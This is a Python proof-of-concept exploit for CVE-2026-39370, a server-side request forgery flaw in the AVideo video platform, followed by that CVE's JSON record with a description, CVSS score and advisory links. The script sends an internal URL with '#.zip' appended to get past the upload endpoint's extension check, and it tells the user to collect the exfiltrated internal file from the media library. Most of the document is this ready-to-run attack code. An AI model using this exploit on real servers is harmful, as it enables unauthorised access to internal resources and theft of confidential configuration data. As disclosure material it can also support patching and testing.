CVE-2026-39370

import requests def exploit_ssrf(target_url, attacker_cookie, internal_url): """ Exploit CVE-2026-39370: SSRF in AVideo via downloadURL bypass. The vulnerable endpoint checks for specific extensions (.mp4, .zip, etc.) to validate the URL, allowing requests to internal networks. """ # The endpoint vulnerable to SSRF upload_endpoint = f"{target_url}/objects/aVideoEncoder.json.php" # Payload: Internal resource with an allowed extension appended to bypass validation # Example: Accessing internal admin config using .zip extension bypass_url = f"{internal_url}#.zip" payload = { "downloadURL": bypass_url, "title": "SSRF_Exploit" } headers = { "Cookie": f"PHPSESSID={attacker_cookie}", "User-Agent": "Mozilla/5.0" } try: response = requests.post(upload_endpoint, data=payload, headers=headers, timeout=10) if response.status_code == 200: print("[+] Request sent successfully.") print(f"[+] Server response: {response.text}") print("[+] Check the media library for the exfiltrated file content.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": # Configuration TARGET = "http://localhost/avideo" COOKIE = "valid_session_id_here" INTERNAL_TARGET = "http://127.0.0.1/admin/config.php" exploit_ssrf(TARGET, COOKIE, INTERNAL_TARGET)

{"cve": {"id": "CVE-2026-39370", "sourceIdentifier": "[email protected]", "published": "2026-04-07T20:16:31.520", "lastModified": "2026-04-22T18:50:11.680", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions 26.0 and prior, objects/aVideoEncoder.json.php still allows attacker-controlled downloadURL values with common media or archive extensions such as .mp4, .mp3, .zip, .jpg, .png, .gif, and .webm to bypass SSRF validation. The server then fetches the response and stores it as media content. This allows an authenticated uploader to turn the upload-by-URL flow into a reliable SSRF response-exfiltration primitive. The vulnerability is caused by an incomplete fix for CVE-2026-27732."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndIncluding": "26.0", "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-cmcr-q4jf-p6q9", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-cmcr-q4jf-p6q9", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory"]}]}}